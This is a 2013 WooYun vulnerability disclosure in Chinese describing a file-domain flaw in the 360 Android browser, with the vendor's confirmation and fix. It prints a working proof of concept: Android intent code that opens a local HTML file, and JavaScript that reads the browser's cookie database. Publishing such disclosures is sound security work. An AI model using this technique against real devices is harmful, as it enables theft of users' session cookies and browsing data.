当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037836

漏洞标题:360手机浏览器缺陷可导致用户敏感数据泄漏

相关厂商:奇虎360

漏洞作者: 路人甲

提交时间:2013-09-23 11:09

修复时间:2013-12-22 11:09

公开时间:2013-12-22 11:09

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-23: 细节已通知厂商并且等待厂商处理中
2013-09-23: 厂商已经确认,细节仅向厂商公开
2013-09-26: 细节向第三方安全合作伙伴开放
2013-11-17: 细节向核心白帽子及相关领域专家公开
2013-11-27: 细节向普通白帽子公开
2013-12-07: 细节向实习白帽子公开
2013-12-22: 细节向公众公开

简要描述:

当一个攻击app(恶意或非恶意均可以) 向360浏览器发送请求要求打开一个本地页面时,此本地页面中的可以按照攻击app的要求获取360浏览器下的所有数据,包括cookie信息等,盗取过程无需root,盗取之后可以发送给远程服务器!求奖励!

详细说明:

Android平台360手机浏览器最新版
MD5: 5b252a142a450b34bd3253acb51882bd
2013年9月22日 17:00

copyFile(); //自定义函数,释放filehehe.html到sd卡上
String url = "file:///mnt/sdcard/filehehe.html";
Intent contIntent = new Intent();
contIntent.setAction("android.intent.action.VIEW");
contIntent.setData(Uri.parse(url));
Intent intent = new Intent();
intent.setClassName("com.qihoo.browser","com.qihoo.browser.BrowserActivity");
intent.setAction("android.intent.action.VIEW");
intent.setData(Uri.parse(url));
this.startActivity(intent);


其中获取关键信息的filehehe.html文件:

function getDatabase() {	
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}

xmlhttp = request;

var prefix = "file:////data/data/com.qihoo.browser/databases";
var postfix = "/webviewCookiesChromium.db"; //取保存cookie的db
var path = prefix.concat(postfix);
// 获取本地文件代码
xmlhttp.open("GET", path, false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;
return ret;
}


漏洞证明:

有代码了要个蛋的证明

修复方案:

限制file域的访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-09-23 19:32

厂商回复:

感谢反馈,该漏洞是Android系统webkit内核对本地文件支持存在的漏洞, 在Android 4.1系统中已修复.
我们会针对4.0版本及以前版本Android系统加紧推出新版本解决这个安全问题.

最新状态:

2013-09-24:修复此漏洞的版本9月24日已上线。